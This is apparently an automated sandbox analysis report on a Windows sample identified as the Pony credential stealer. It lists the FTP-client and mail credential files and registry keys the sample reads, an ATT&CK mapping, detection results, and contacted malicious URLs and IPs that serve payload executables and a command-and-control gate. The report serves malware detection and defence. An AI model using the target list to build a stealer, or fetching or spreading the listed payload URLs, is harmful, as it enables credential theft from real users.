Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Windows\32BitFtp.ini	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\3D-FTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Windows\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword		0_2_0040E9CE
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword		0_2_0040E9CE

Remote Access Functionality

Yara detected Pony

Source: Yara match	File source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 Valid Accounts	1 Valid Accounts	1 Valid Accounts	2 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	22 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Access Token Manipulation	1 Virtualization/Sandbox Evasion	2 Credentials in Registry	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Access Token Manipulation	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	2 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
8WgZHDQckx.exe	95%	ReversingLabs	Win32.Downloader.Upatre
8WgZHDQckx.exe	100%	Avira	TR/PSW.Tepfer.EB.1
8WgZHDQckx.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://6.magicalomaha.com/forum/viewtopic.php	0%	Avira URL Cloud	safe
http://https://ftp://operawand.dat_Software	0%	Avira URL Cloud	safe
http://6.magicalomaha.com/forum/viewtopic.phpR	0%	Avira URL Cloud	safe
http://dynamotouren.de/4XM2f.exeT5C5	0%	Avira URL Cloud	safe
http://www.seigner-art.at/fPsx8i.exe	0%	Avira URL Cloud	safe
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	0%	Avira URL Cloud	safe
http://6.magicalomaha.co/forum/viewtopic.phphttp://6.magicalomaha.com/forum/viewtopic.phphttp://dyna	0%	Avira URL Cloud	safe
http://www.ibsensoftware.com/	0%	Avira URL Cloud	safe
http://208.116.13.164/b6dK7rwV.exe	0%	Avira URL Cloud	safe
http://www.aboessen24.de/WWkULwkq.exe	0%	Avira URL Cloud	safe
http://dynamotouren.de/4XM2f.exe	0%	Avira URL Cloud	safe
https://www.dynamotouren.com/?dynamotouren.de	0%	Avira URL Cloud	safe
http://72.32.185.12/rd7nr.exe	0%	Avira URL Cloud	safe
http://6.magicalomaha.co/forum/viewtopic.php	0%	Avira URL Cloud	safe
http://app.bi.com.tr/fPFa.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
6.magicalomaha.co	208.91.197.44	true	true	unknown
www.dynamotouren.com	188.114.97.6	true	true	unknown
dynamotouren.de	104.21.17.37	true	true	unknown
6.magicalomaha.com	unknown	unknown	true	unknown
app.bi.com.tr	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.seigner-art.at/fPsx8i.exe	true	Avira URL Cloud: safe	unknown
http://208.116.13.164/b6dK7rwV.exe	true	Avira URL Cloud: safe	unknown
http://6.magicalomaha.com/forum/viewtopic.php	true	Avira URL Cloud: safe	unknown
http://www.aboessen24.de/WWkULwkq.exe	true	Avira URL Cloud: safe	unknown
http://dynamotouren.de/4XM2f.exe	true	Avira URL Cloud: safe	unknown
https://www.dynamotouren.com/?dynamotouren.de	true	Avira URL Cloud: safe	unknown
http://72.32.185.12/rd7nr.exe	true	Avira URL Cloud: safe	unknown
http://6.magicalomaha.co/forum/viewtopic.php	true	Avira URL Cloud: safe	unknown
http://app.bi.com.tr/fPFa.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://https://ftp://operawand.dat_Software	8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	false		high
http://dynamotouren.de/4XM2f.exeT5C5	8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	false		high
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://6.magicalomaha.co/forum/viewtopic.phphttp://6.magicalomaha.com/forum/viewtopic.phphttp://dyna	8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://6.magicalomaha.com/forum/viewtopic.phpR	8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ibsensoftware.com/	8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.6	www.dynamotouren.com	European Union	13335	CLOUDFLARENETUS	true
72.32.185.12	unknown	United States	33070	RMH-14US	true
104.21.17.37	dynamotouren.de	United States	13335	CLOUDFLARENETUS	true
208.91.197.44	6.magicalomaha.co	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570690
Start date and time:	2024-12-07 18:26:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	8WgZHDQckx.exe renamed because original name is a hash value
Original Sample Name:	2FBFC79462B64751C339F0B0297C748F.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@15/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 94 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 8WgZHDQckx.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.6	fUHl7rElXU.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/OARvm
	ibk0BQaWAo.exe	Get hash	malicious	Unknown	Browse	orbitdownloader.com/
	ibk0BQaWAo.exe	Get hash	malicious	Unknown	Browse	orbitdownloader.com/
	INVOICE087667899.exe	Get hash	malicious	Unknown	Browse	heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
	ZciowjM9hN.exe	Get hash	malicious	Lokibot	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
104.21.17.37	CS2-KC.exe	Get hash	malicious	Unknown	Browse
208.91.197.44	SWIFT_COPY20240604.cmd	Get hash	malicious	DBatLoader, FormBook	Browse	www.ng1ljmv67o.com/bh91/?hZM0=HPFh&8Fs=sprRKXXcPZhyDcVi3KQzp4EjbvIcYS55Pse02ULNwZoaMH7DGMwJIaU8WcNts2rSxaDc4FiZe8q29WnAbxSgSRWjszpYBNIX27r+Mt3U05mla1ncXqJI78E=
	x5SCX6JcAx3AM1x.exe	Get hash	malicious	FormBook	Browse	www.jcbenterprisessite.com/vi45/
	Microsoftdigitalwallettechnologydevelopedrecentlyforsecuritypurposetoprotectcustomer.Doc.doc	Get hash	malicious	FormBook, GuLoader	Browse	www.jcbenterprisessite.com/q58d/?2z=hBUDNno&6zk=wuE6VRPdyqNLkzjmmeXLGMiBStB9jHVp2+Bu1MnD/arrna03wDcRkY/UyLBwpRywvG3j4jg2o6j+Pt4thT8HfP2y3qZzmGCysm/8rG0=
	file.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.jcbenterprisessite.com/q58d/?7B6=6Twl&lt6=wuE6VRPdyqNLkzjmmaSVHI+BYJ14jnVp2+Bu1MnD/arrna03wDcR1tTyy/NzoTawu23wiXN8s7f6KNpOvT4qYNevtdVIkWGlog==
	cNF4Mtqlwc.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.jcbenterprisessite.com/q58d/?DP=KV9t0ll8T0wXvRc&RVa4tR48=wuE6VRPdyqNLkzjmmaSVHI+BYJ14jnVp2+Bu1MnD/arrna03wDcR1tTyy/NzoTawu23wiXN8s7f6KNpOvT4qYNevtdVIkWGlog==
	Invoices.xls	Get hash	malicious	FormBook, GuLoader	Browse	www.jcbenterprisessite.com/q58d/?fdsX=SDStHjf&hhZP60XP=wuE6VRPdyqNLkzjmmeXLGMiBStB9jHVp2+Bu1MnD/arrna03wDcRkY/UyLBwpRywvG3j4jg2o6j+Pt4thT8HfP2y3qZzmGCysm/8rG0=
	mvJLQOpZDB.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.jcbenterprisessite.com/q58d/?iljt=vBALFVgxyLX&2NuX_dN=wuE6VRPdyqNLkzjn7qTbG7nbF8dG1xFp2+Bu1MnD/arrna03wDcR1tTyy/NzoTawu23wiXN8s7f6KNpOvT4rKba/6+9+jzOMow==
	Invoices.xls	Get hash	malicious	FormBook, GuLoader	Browse	www.jcbenterprisessite.com/q58d/?h80lj=wuE6VRPdyqNLkzjmmeXLGMiBStB9jHVp2+Bu1MnD/arrna03wDcRkY/UyLBwpRywvG3j4jg2o6j+Pt4thT8HfP2y3qZzmGCysm/8rG0=&yx=kJwPMD
	admindemo.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.jcbenterprisessite.com/d8ts/?fDFLo07H=uwSv4j8DYTBv8vGqbtWvUWmemvh0yBIKYysdqe9NkHMtQNSN/Ip/4vwVK+hgLlUlWP1iwI6Bd2eBdRjZiUsDsPh3V0vlLyWTCZKjVeevmt59&9L6Hg=ulFd44MP04
	PdgJ01XGim.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.jcbenterprisessite.com/q58d/?yz=bDTX8fzH4&g4q4cn=wuE6VRPdyqNLkzjn7qTbG7nbF8dG1xFp2+Bu1MnD/arrna03wDcR1tTyy/NzoTawu23wiXN8s7f6KNpOvT4qYPaywapIkWG5vQ==

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc	Browse	104.21.16.9
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	INVOICES.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	Microsoft.doc	Get hash	malicious	Unknown	Browse	172.67.19.24
	upgrade.hta	Get hash	malicious	DarkVision Rat	Browse	172.66.0.235
	IMPORTANT DOCUMENT.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	IMPORTANT DOCUMENT.html	Get hash	malicious	Unknown	Browse	104.17.25.14
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc	Browse	104.21.16.9
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	INVOICES.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	Microsoft.doc	Get hash	malicious	Unknown	Browse	172.67.19.24
	upgrade.hta	Get hash	malicious	DarkVision Rat	Browse	172.66.0.235
	IMPORTANT DOCUMENT.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	IMPORTANT DOCUMENT.html	Get hash	malicious	Unknown	Browse	104.17.25.14
RMH-14US	jew.sh4.elf	Get hash	malicious	Unknown	Browse	166.79.105.235
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	72.41.62.234
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	72.3.162.84
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	72.41.62.236
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	72.40.38.11
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	104.130.154.4
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	166.78.163.205
	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	166.79.176.16
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	72.41.44.208
	nabarm5.elf	Get hash	malicious	Unknown	Browse	23.253.114.144

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.929206239273409
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	8WgZHDQckx.exe
File size:	381'552 bytes
MD5:	2fbfc79462b64751c339f0b0297c748f
SHA1:	3c07b52af2661e02e4db7dc978a83db0ba7c570f
SHA256:	2b7658a9c50bf8ee549193723e56b6500d4a193a5eb8e10871c67956d5d4e835
SHA512:	dbc3b7d8a7419feacf98481f542991edfcfe67d48a31244aff3818d28770842c2b7fd62a6d174e0132946ab73e60c00213a3c116090559e75512f38047b7a827
